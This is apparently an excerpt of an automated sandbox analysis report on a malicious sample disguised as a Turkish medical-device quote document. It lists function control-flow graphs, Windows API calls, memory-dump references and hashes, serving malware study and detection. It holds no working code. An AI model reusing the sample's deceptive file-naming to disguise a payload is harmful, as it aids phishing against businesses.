                                                                                                    • Instruction ID: 220908c19d8b7c0822dba6a7d19ed25906b4e6ab9da282e2d97ed30be5c395d5
                                                                                                    • Opcode Fuzzy Hash: 743ae24824eedc62568ef5d919530f9e1f9b46dc0cc2c9afc1a873293d44ea88
                                                                                                    • Instruction Fuzzy Hash: 123122B0D01348DFDB50DF99C988B9DBFF5AB48704F208059E404AB290D7B4A845CF95
                                                                                                    Function 0657992C Relevance: 1.6, APIs: 1, Instructions: 62libraryCOMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 1088 657992c 1089 65799eb-65799fc 1088->1089 1090 6579a03-6579a0c 1089->1090 1091 65799fe 1089->1091 1093 65797e3-6579808 1090->1093 1094 6579a12-6579a25 1090->1094 1091->1090 1095 657980f-6579846 1093->1095 1096 657980a 1093->1096 1097 6579a27 1094->1097 1098 6579a2c-6579a47 1094->1098 1107 657984d-657987f 1095->1107 1108 6579848 1095->1108 1096->1095 1097->1098 1099 6579a4e-6579a62 1098->1099 1100 6579a49 1098->1100 1104 6579a64 1099->1104 1105 6579a69-6579a7f LdrInitializeThunk 1099->1105 1100->1099 1104->1105 1106 6579a81-6579b7e 1105->1106 1111 6579b86-6579b90 1106->1111 1112 6579b80-6579b85 1106->1112 1113 65798e3-65798f6 1107->1113 1114 6579881-65798a6 1107->1114 1108->1107 1112->1111 1118 65798fd-6579922 1113->1118 1119 65798f8 1113->1119 1115 65798ad-65798db 1114->1115 1116 65798a8 1114->1116 1115->1113 1116->1115 1122 6579924-6579925 1118->1122 1123 6579931-6579969 1118->1123 1119->1118 1122->1094 1124 6579970-65799d1 call 6579328 1123->1124 1125 657996b 1123->1125 1131 65799d3 1124->1131 1132 65799d8-65799ea 1124->1132 1125->1124 1131->1132 1132->1089
                                                                                                    APIs
                                                                                                    • LdrInitializeThunk.NTDLL(00000000), ref: 06579A6E
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.4689247062.0000000006570000.00000040.00000800.00020000.00000000.sdmp, Offset: 06570000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_6570000_fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg doc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: InitializeThunk
                                                                                                    • String ID:
                                                                                                    • API String ID: 2994545307-0
                                                                                                    • Opcode ID: 9155e384962665a6b3ce1b37930b74fb0bd77d05e2292a7da3f7409ab51ba61e
                                                                                                    • Instruction ID: 1c3ec619a1633d1a041f0ec4e3fa5948af4d14717059bcd6f3f6ee5cd2cf1012
                                                                                                    • Opcode Fuzzy Hash: 9155e384962665a6b3ce1b37930b74fb0bd77d05e2292a7da3f7409ab51ba61e
                                                                                                    • Instruction Fuzzy Hash: FD116A78E012198FEB44CFE8E884FADB7B5FB88314F148265E804A7255DB70E942CB60
                                                                                                    Function 0674AD28 Relevance: 1.5, APIs: 1, Instructions: 49comCOMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 1134 674ad28-674ad2d 1135 674ada2-674adb8 1134->1135 1136 674ad2f 1134->1136 1137 674ad30-674ad92 OleInitialize 1136->1137 1139 674ad94-674ad9a 1137->1139 1140 674ad9b 1137->1140 1139->1140 1140->1135
                                                                                                    APIs
                                                                                                    • OleInitialize.OLE32(00000000), ref: 0674AD85
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.4690185493.0000000006740000.00000040.00000800.00020000.00000000.sdmp, Offset: 06740000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_6740000_fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg doc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Initialize
                                                                                                    • String ID:
                                                                                                    • API String ID: 2538663250-0
                                                                                                    • Opcode ID: f196afa30bd9917422642abed479ee21932aa88b961b1811e8b774e6df90d02a
                                                                                                    • Instruction ID: e73cc90d2e3139c1725fb86c940582105ebfc2135a1796ca6dda9d42ede8633c
                                                                                                    • Opcode Fuzzy Hash: f196afa30bd9917422642abed479ee21932aa88b961b1811e8b774e6df90d02a
                                                                                                    • Instruction Fuzzy Hash: 691103B58003498FCB60DF9AD948BDEBBF8EB48324F20841AE518A7210D775A944CFA5
                                                                                                    Function 0674AF3C Relevance: 1.5, APIs: 1, Instructions: 46windowCOMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 1149 674af3c-674c10a DispatchMessageW 1152 674c113-674c127 1149->1152 1153 674c10c-674c112 1149->1153 1153->1152
                                                                                                    APIs
                                                                                                    • DispatchMessageW.USER32(?,?,?,?,?,?,00000000,-00000018,?,0674B677), ref: 0674C0FD
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.4690185493.0000000006740000.00000040.00000800.00020000.00000000.sdmp, Offset: 06740000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_6740000_fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg doc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: DispatchMessage
                                                                                                    • String ID:
                                                                                                    • API String ID: 2061451462-0
                                                                                                    • Opcode ID: c608c7c222153dab6e33c496190472d940ec2b950d60c1ec3f8daa7de258e3e7
                                                                                                    • Instruction ID: 6c6e7656c27eaf1ee94b5258151a5563949b95531fdc7ef16cf2825493f791fb
                                                                                                    • Opcode Fuzzy Hash: c608c7c222153dab6e33c496190472d940ec2b950d60c1ec3f8daa7de258e3e7
                                                                                                    • Instruction Fuzzy Hash: 3B11E0B1C04649CFCB60DF9AE848B9EBBF4EB48224F10842AD559A3210D3B9A544CFA5
                                                                                                    Function 06749F08 Relevance: 1.5, APIs: 1, Instructions: 46comCOMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 1142 6749f08-674ad92 OleInitialize 1144 674ad94-674ad9a 1142->1144 1145 674ad9b-674adb8 1142->1145 1144->1145
                                                                                                    APIs
                                                                                                    • OleInitialize.OLE32(00000000), ref: 0674AD85
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.4690185493.0000000006740000.00000040.00000800.00020000.00000000.sdmp, Offset: 06740000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_6740000_fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg doc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Initialize
                                                                                                    • String ID:
                                                                                                    • API String ID: 2538663250-0
                                                                                                    • Opcode ID: 2c3125154ee6c88d397c9a31c4fd876e02d46b7a8e3769c1b02401673022b3f8
                                                                                                    • Instruction ID: edd662e379d78b3a92c36e2c76d2e941cb44cfe930834432558ca5dc62941e25
                                                                                                    • Opcode Fuzzy Hash: 2c3125154ee6c88d397c9a31c4fd876e02d46b7a8e3769c1b02401673022b3f8
                                                                                                    • Instruction Fuzzy Hash: 8D1115B1C00349CFDB60DF9AD549BDEBBF4EB48324F20845AE519A7200D378A944CFA5
                                                                                                    Function 0284AEF0 Relevance: 1.4, Strings: 1, Instructions: 144COMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 1758 284aef0-284aef1 1759 284aef3-284aef5 1758->1759 1760 284aecf-284aed0 1758->1760 1761 284aef7-284aef9 1759->1761 1762 284aed3 1759->1762 1760->1762 1763 284aed7-284aed9 1761->1763 1764 284aefb-284af40 1761->1764 1762->1763 1765 284aedf-284aee3 1763->1765 1766 284aedb-284aedd 1763->1766 1770 284af42-284af4d 1764->1770 1771 284af53-284af5e 1764->1771 1768 284aee9-284aeea 1765->1768 1766->1768 1770->1771 1774 284afd6-284b028 1770->1774 1775 284af64-284afc1 1771->1775 1776 284b02f 1771->1776 1774->1776 1783 284afca-284afd3 1775->1783 1778 284b037-284b051 1776->1778 1778->1776 1786 284b053-284b059 1778->1786 1786->1778 1788 284b05b-284b074 call 2847c88 1786->1788 1792 284b085-284b093 1788->1792 1793 284b076-284b083 1788->1793 1797 284b095-284b09f 1792->1797 1798 284b0a1 1792->1798 1800 284b0a3-284b0a6 1793->1800 1797->1800 1798->1800
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.4683077117.0000000002840000.00000040.00000800.00020000.00000000.sdmp, Offset: 02840000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_2840000_fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg doc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: 3
                                                                                                    • API String ID: 0-1842515611
                                                                                                    • Opcode ID: cb69702363db7f2235ddf9f530140357f6f070bf70706a03273430c20d86186e
                                                                                                    • Instruction ID: 68da5361b8e3d946fa0a25e7e7e6636d999b5414414f4ff25b892d52fd2ec996
                                                                                                    • Opcode Fuzzy Hash: cb69702363db7f2235ddf9f530140357f6f070bf70706a03273430c20d86186e
                                                                                                    • Instruction Fuzzy Hash: 2741E539B002489FDB089B65D8646AE7BE2FFCC355F14406AE91ADB391DF359D02C790
                                                                                                    Function 0284E017 Relevance: .6, Instructions: 647COMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 2308 284e017-284e022 2309 284e024 2308->2309 2310 284e029-284e02a call 284e8f7 2308->2310 2309->2310 2311 284e030-284e099 2310->2311 2327 284e0a0-284e0a7 call 284f744 2311->2327 2634 284e0a8 call 6570c01 2327->2634 2635 284e0a8 call 6570b30 2327->2635 2636 284e0a8 call 6570b20 2327->2636 2329 284e0ae 2637 284e0af call 65717a0 2329->2637 2638 284e0af call 657178f 2329->2638 2330 284e0b5 2639 284e0b6 call 6571e70 2330->2639 2640 284e0b6 call 6571e80 2330->2640 2331 284e0bc 2641 284e0bd call 657295a 2331->2641 2642 284e0bd call 6572968 2331->2642 2332 284e0c3-284e0d1 2335 284e0d8 2332->2335 2336 284e0df 2335->2336 2643 284e0e0 call 657de00 2336->2643 2644 284e0e0 call 657ddff 2336->2644 2337 284e0e6-284e0ed 2339 284e0f4-284e0fb 2337->2339 2341 284e102-284e110 2339->2341 2344 284e117-284e11e 2341->2344 2346 284e125 2344->2346 2347 284e12c 2346->2347 2348 284e133 2347->2348 2349 284e13a 2348->2349 2350 284e141 2349->2350 2351 284e148 2350->2351 2352 284e14f-284e156 2351->2352 2354 284e15d-284e164 2352->2354 2356 284e16b 2354->2356 2357 284e172-284e179 2356->2357 2359 284e180 2357->2359 2360 284e187 2359->2360 2361 284e18e 2360->2361 2362 284e195-284e19c 2361->2362 2364 284e1a3-284e1b1 2362->2364 2367 284e1b8-284e1bf 2364->2367 2369 284e1c6 2367->2369 2370 284e1cd-284e1d4 2369->2370 2372 284e1db-284e1e2 2370->2372 2374 284e1e9 2372->2374 2375 284e1f0 2374->2375 2376 284e1f7 2375->2376 2377 284e1fe 2376->2377 2378 284e205 2377->2378 2379 284e20c-284e213 2378->2379 2381 284e21a 2379->2381 2382 284e221-284e22f 2381->2382 2385 284e236-284e23d 2382->2385 2387 284e244 2385->2387 2388 284e24b-284e252 2387->2388 2390 284e259 2388->2390 2391 284e260 2390->2391 2392 284e267-284e275 2391->2392 2395 284e27c-284e283 2392->2395 2397 284e28a 2395->2397 2398 284e291 2397->2398 2399 284e298-284e29f 2398->2399 2401 284e2a6-284e2ad 2399->2401 2403 284e2b4-284e2bb 2401->2403 2405 284e2c2-284e2c9 2403->2405 2407 284e2d0-284e2d7 2405->2407 2409 284e2de-284e2f3 2407->2409 2413 284e2fa-284e301 2409->2413 2415 284e308 2413->2415 2416 284e30f-284e316 2415->2416 2418 284e31d-284e324 2416->2418 2420 284e32b-284e332 2418->2420 2422 284e339 2420->2422 2423 284e340 2422->2423 2424 284e347-284e34e 2423->2424 2426 284e355-284e35c 2424->2426 2428 284e363-284e36a 2426->2428 2430 284e371-284e378 2428->2430 2432 284e37f-284e386 2430->2432 2434 284e38d 2432->2434 2435 284e394 2434->2435 2436 284e39b-284e3a2 2435->2436 2438 284e3a9-284e3b7 2436->2438 2441 284e3be 2438->2441 2442 284e3c5-284e3cc 2441->2442 2444 284e3d3 2442->2444 2445 284e3da 2444->2445 2446 284e3e1 2445->2446 2447 284e3e8-284e3f6 2446->2447 2450 284e3fd-284e412 2447->2450 2454 284e419-284e420 2450->2454 2456 284e427-284e482 2454->2456 2470 284e489 2456->2470 2471 284e490-284e4f9 2470->2471 2487 284e500-284e507 2471->2487 2489 284e50e-284e515 2487->2489 2491 284e51c 2489->2491 2492 284e523-284e538 2491->2492 2496 284e53f 2492->2496 2497 284e546-284e60a 2496->2497 2526 284e611-284e618 2497->2526 2630 284e619 call 657fc5e 2526->2630 2631 284e619 call 657fc68 2526->2631 2528 284e61f 2529 284e626 2528->2529 2530 284e62d-284e63b 2529->2530 2533 284e642 2530->2533 2534 284e649-284e6d5 2533->2534 2555 284e6dc 2534->2555 2556 284e6e3-284e71b 2555->2556 2565 284e722-284e729 2556->2565 2567 284e730-284e73e 2565->2567 2570 284e745 2567->2570 2571 284e74c-284e82c 2570->2571 2604 284e833 2571->2604 2605 284e83a-284e848 2604->2605 2608 284e84f 2605->2608 2609 284e856 2608->2609 2610 284e85d 2609->2610 2611 284e864-284e879 2610->2611 2615 284e880-284e8aa 2611->2615 2622 284e8b1-284e8cd 2615->2622 2627 284e8d4-284e8db 2622->2627 2629 284e8e2-284e8e5 2627->2629 2630->2528 2631->2528 2634->2329 2635->2329 2636->2329 2637->2330 2638->2330 2639->2331 2640->2331 2641->2332 2642->2332 2643->2337 2644->2337
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.4683077117.0000000002840000.00000040.00000800.00020000.00000000.sdmp, Offset: 02840000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_2840000_fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg doc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 023bdce3dafded855531b27cfa3fc80fef8f6dadf616a6024b8422e3befb88cc
                                                                                                    • Instruction ID: beb46f94601c425fe55c90a129a87e5607020fe16b8e37728cf75539aac12354
                                                                                                    • Opcode Fuzzy Hash: 023bdce3dafded855531b27cfa3fc80fef8f6dadf616a6024b8422e3befb88cc
                                                                                                    • Instruction Fuzzy Hash: ED129835121253EF9640AF61E6BC26EBB65FB5F327304AD09E10FC1295DF794C88CA62
                                                                                                    Function 0284E018 Relevance: .6, Instructions: 647COMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 2645 284e018-284e022 2646 284e024 2645->2646 2647 284e029-284e0a7 call 284e8f7 call 284f744 2645->2647 2646->2647 2971 284e0a8 call 6570c01 2647->2971 2972 284e0a8 call 6570b30 2647->2972 2973 284e0a8 call 6570b20 2647->2973 2666 284e0ae 2974 284e0af call 65717a0 2666->2974 2975 284e0af call 657178f 2666->2975 2667 284e0b5 2976 284e0b6 call 6571e70 2667->2976 2977 284e0b6 call 6571e80 2667->2977 2668 284e0bc 2978 284e0bd call 657295a 2668->2978 2979 284e0bd call 6572968 2668->2979 2669 284e0c3-284e0df 2980 284e0e0 call 657de00 2669->2980 2981 284e0e0 call 657ddff 2669->2981 2674 284e0e6-284e618 2967 284e619 call 657fc5e 2674->2967 2968 284e619 call 657fc68 2674->2968 2865 284e61f-284e8db 2966 284e8e2-284e8e5 2865->2966 2967->2865 2968->2865 2971->2666 2972->2666 2973->2666 2974->2667 2975->2667 2976->2668 2977->2668 2978->2669 2979->2669 2980->2674 2981->2674
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.4683077117.0000000002840000.00000040.00000800.00020000.00000000.sdmp, Offset: 02840000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_2840000_fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg doc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: ab46e87563a80df01dff95b016555f5d9a34d8d2d7979e68c0ee24c4511bbd70
                                                                                                    • Instruction ID: ac9a53882410a91af0fa0dba4c5f8d9b0b3bd5eed7c6e2a82acdfe4f15cf076a
                                                                                                    • Opcode Fuzzy Hash: ab46e87563a80df01dff95b016555f5d9a34d8d2d7979e68c0ee24c4511bbd70
                                                                                                    • Instruction Fuzzy Hash: 73129835121253EF9240AF61E6BC22EBB65FB5F327304AD09E10FC1295DF794C88CA62
                                                                                                    Function 02840C9F Relevance: .5, Instructions: 539COMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 2982 2840c9f-2840cc0 2983 2840cc7-2840cdd call 2840780 2982->2983 2984 2840cc2 2982->2984 2987 2840ce2 2983->2987 2984->2983 2988 2840cee-284104e call 2840780 * 13 2987->2988 3062 2841056-284107d call 28427ff 2988->3062 3171 2841080 call 2843cc0 3062->3171 3172 2841080 call 2843cb1 3062->3172 3065 2841086-284108f 3173 2841092 call 28441a0 3065->3173 3174 2841092 call 28441a1 3065->3174 3066 2841098-28410c2 3069 28410cb-28410ce call 2845381 3066->3069 3070 28410d4-28410fe 3069->3070 3073 2841107-284110a call 284c1a7 3070->3073 3074 2841110-284113a 3073->3074 3077 2841143-2841146 call 284c477 3074->3077 3078 284114c-2841176 3077->3078 3081 284117f-2841182 call 284c73f 3078->3081 3082 2841188-28411b2 3081->3082 3085 28411bb 3082->3085 3189 28411be call 284ca0c 3085->3189 3190 28411be call 284ca19 3085->3190 3086 28411c4-28411f7 3089 2841203-2841209 call 284cce7 3086->3089 3090 284120f-284124b 3089->3090 3093 2841257-284125d call 284cfb7 3090->3093 3094 2841263-284129f 3093->3094 3097 28412ab-28412b1 call 284d284 3094->3097 3098 28412b7-28413d2 3097->3098 3111 28413de-28413f0 call 2845381 3098->3111 3112 28413f6-284145c 3111->3112 3117 2841467-2841473 call 284d557 3112->3117 3118 2841479-2841485 3117->3118 3119 2841490-284149c call 284d557 3118->3119 3120 28414a2-28414ae 3119->3120 3121 28414b9-28414c5 call 284d557 3120->3121 3122 28414cb-28414d7 3121->3122 3123 28414e2-28414ee call 284d557 3122->3123 3124 28414f4-2841500 3123->3124 3125 284150b-2841517 call 284d557 3124->3125 3126 284151d-2841529 3125->3126 3127 2841534-2841540 call 284d557 3126->3127 3128 2841546-2841552 3127->3128 3129 284155d-2841569 call 284d557 3128->3129 3130 284156f-284158c 3129->3130 3132 2841597-28415a3 call 284d557 3130->3132 3133 28415a9-28415b5 3132->3133 3134 28415c0-28415cc call 284d557 3133->3134 3135 28415d2-28415de 3134->3135 3136 28415e9-28415f5 call 284d557 3135->3136 3137 28415fb-2841607 3136->3137 3138 2841612-284161e call 284d557 3137->3138 3139 2841624-2841630 3138->3139 3140 284163b-2841647 call 284d557 3139->3140 3141 284164d-2841659 3140->3141 3142 2841664-2841670 call 284d557 3141->3142 3143 2841676-2841682 3142->3143 3144 284168d-2841699 call 284d557 3143->3144 3145 284169f-28416ab 3144->3145 3146 28416b6-28416c2 call 284d557 3145->3146 3147 28416c8-28416d4 3146->3147 3148 28416df-28416eb call 284d557 3147->3148 3149 28416f1-28417aa 3148->3149 3171->3065 3172->3065 3173->3066 3174->3066 3189->3086 3190->3086
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.4683077117.0000000002840000.00000040.00000800.00020000.00000000.sdmp, Offset: 02840000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_2840000_fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg doc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 6811234869c104c3d305865deed2b950ef6e2258a4def30bcd2e64371915f180
                                                                                                    • Instruction ID: c865675af346f2882822cbd215ca1375dc1f28e2009362ddc20b208336d3c119
                                                                                                    • Opcode Fuzzy Hash: 6811234869c104c3d305865deed2b950ef6e2258a4def30bcd2e64371915f180
                                                                                                    • Instruction Fuzzy Hash: 8752F978900619CFDB54EF24E998B9DBBB2FB88301F1085D9D509A7364DB70AE81DF81
                                                                                                    Function 02840CA0 Relevance: .5, Instructions: 539COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.4683077117.0000000002840000.00000040.00000800.00020000.00000000.sdmp, Offset: 02840000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_2840000_fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg doc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: ec60ce7aea36f7543776a71ceb460ba87bb9d4d2d981f188f2aa8bbada5fe242
                                                                                                    • Instruction ID: 909c0e327414269e703e695eaead49ce2aa3a3151f33c99fadd19aae0959fc75
                                                                                                    • Opcode Fuzzy Hash: ec60ce7aea36f7543776a71ceb460ba87bb9d4d2d981f188f2aa8bbada5fe242
                                                                                                    • Instruction Fuzzy Hash: 9B52F978900619CFDB54EF24E998B9DBBB2FB88301F1085D9D509A7364DB70AE81DF81
                                                                                                    Function 028476F1 Relevance: .5, Instructions: 454COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.4683077117.0000000002840000.00000040.00000800.00020000.00000000.sdmp, Offset: 02840000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_2840000_fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg doc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: f8ba946a2b5032338d6ca229e8fff29310823272017c7af395a29e379d045394
                                                                                                    • Instruction ID: fa9aa5f2a777427590a55fec1d004e98adef66167db9b5c74801bd0b3398a782
                                                                                                    • Opcode Fuzzy Hash: f8ba946a2b5032338d6ca229e8fff29310823272017c7af395a29e379d045394
                                                                                                    • Instruction Fuzzy Hash: 33123938A00249DFDB14DF68D884AAEBBF2FF89314F15855AE459EB261DB30ED41CB50
                                                                                                    Function 02845F38 Relevance: .3, Instructions: 323COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.4683077117.0000000002840000.00000040.00000800.00020000.00000000.sdmp, Offset: 02840000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_2840000_fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg doc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: a6694b5cf142c5020d31cd500d9847fee2422cd2a7cdb5e46a8a9b07f2eb178d
                                                                                                    • Instruction ID: 5759c05bcdb9c84333bfe9e5b461786c5c6d1358c89ecddbf400868e77ea8300
                                                                                                    • Opcode Fuzzy Hash: a6694b5cf142c5020d31cd500d9847fee2422cd2a7cdb5e46a8a9b07f2eb178d
                                                                                                    • Instruction Fuzzy Hash: 60B1CE387042299FDB159B24D854B6E7BA6EFCA314F14452AE80ACB391EF79DC02C791
                                                                                                    Function 02846498 Relevance: .2, Instructions: 230COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.4683077117.0000000002840000.00000040.00000800.00020000.00000000.sdmp, Offset: 02840000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_2840000_fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg doc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: a0d67ed896b342f68b03883856d5f517eb5c59f7f1146a935a16d8c8e114bd3d
                                                                                                    • Instruction ID: cdf65fcd35b57f1e8826d74b2b153742abc8dbffbaefb6b4ac8cbc7fd4486931
                                                                                                    • Opcode Fuzzy Hash: a0d67ed896b342f68b03883856d5f517eb5c59f7f1146a935a16d8c8e114bd3d
                                                                                                    • Instruction Fuzzy Hash: 50818E3CB00529CFDB14DF69C884A69BBBAFF8A308B158169D509D7366EF31E841CB50
                                                                                                    Function 028480D8 Relevance: .2, Instructions: 201COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.4683077117.0000000002840000.00000040.00000800.00020000.00000000.sdmp, Offset: 02840000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_2840000_fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg doc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: c1ee61a7b5f731b5037020835c0e4a49d663ff939074b16cb7c96463a438fcca
                                                                                                    • Instruction ID: 796eaf09d3d4ee2e1b45d079660d7e690a63366be59bc1a4febbc48c5a2249ea
                                                                                                    • Opcode Fuzzy Hash: c1ee61a7b5f731b5037020835c0e4a49d663ff939074b16cb7c96463a438fcca
                                                                                                    • Instruction Fuzzy Hash: 3371383C7006198FCB15DF68C894A6A7BE6BF8A204F1500AAE81ADB371DF75DC41CB50
                                                                                                    Function 0284CA0C Relevance: .2, Instructions: 156COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.4683077117.0000000002840000.00000040.00000800.00020000.00000000.sdmp, Offset: 02840000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_2840000_fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg doc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: e16ac5732024f7aba110abbc09dbbb923652f33de396ca60845aabaa30e2448a
                                                                                                    • Instruction ID: 846e0c70788f258e0fd6ac9d91012f1cb8339601ac2edaf8cb1739e3e13058ee
                                                                                                    • Opcode Fuzzy Hash: e16ac5732024f7aba110abbc09dbbb923652f33de396ca60845aabaa30e2448a
                                                                                                    • Instruction Fuzzy Hash: F671B278E0125CCFDB14DFA9D884A9DBBB2BF48304F20819AD419EB361DB709985CF51
                                                                                                    Function 0284F744 Relevance: .1, Instructions: 145COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.4683077117.0000000002840000.00000040.00000800.00020000.00000000.sdmp, Offset: 02840000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_2840000_fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg doc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 59ed88aa63aade459c87d781c4cae9aab282733a2f4076ddef182f4e7110ae7a
                                                                                                    • Instruction ID: 476b7e8dccd3822a1b80e989ebab230d5afc65203b8a330ea8411995291996e9
                                                                                                    • Opcode Fuzzy Hash: 59ed88aa63aade459c87d781c4cae9aab282733a2f4076ddef182f4e7110ae7a
                                                                                                    • Instruction Fuzzy Hash: 9E510138D01219DFDB18DFE5D848AADBBB2FF88300F209129D909AB395DB755A45CF40
                                                                                                    Function 028441A0 Relevance: .1, Instructions: 134COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.4683077117.0000000002840000.00000040.00000800.00020000.00000000.sdmp, Offset: 02840000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_2840000_fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg doc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 62498c9c7c01834cda6d5c78269e98603a533e41c1fe20cc4ca009bedb2ede6b
                                                                                                    • Instruction ID: 1fd39c082a0f300977e3173d3de25d595b3cafe0f70a5aa3b07f20c8c64244e5
                                                                                                    • Opcode Fuzzy Hash: 62498c9c7c01834cda6d5c78269e98603a533e41c1fe20cc4ca009bedb2ede6b
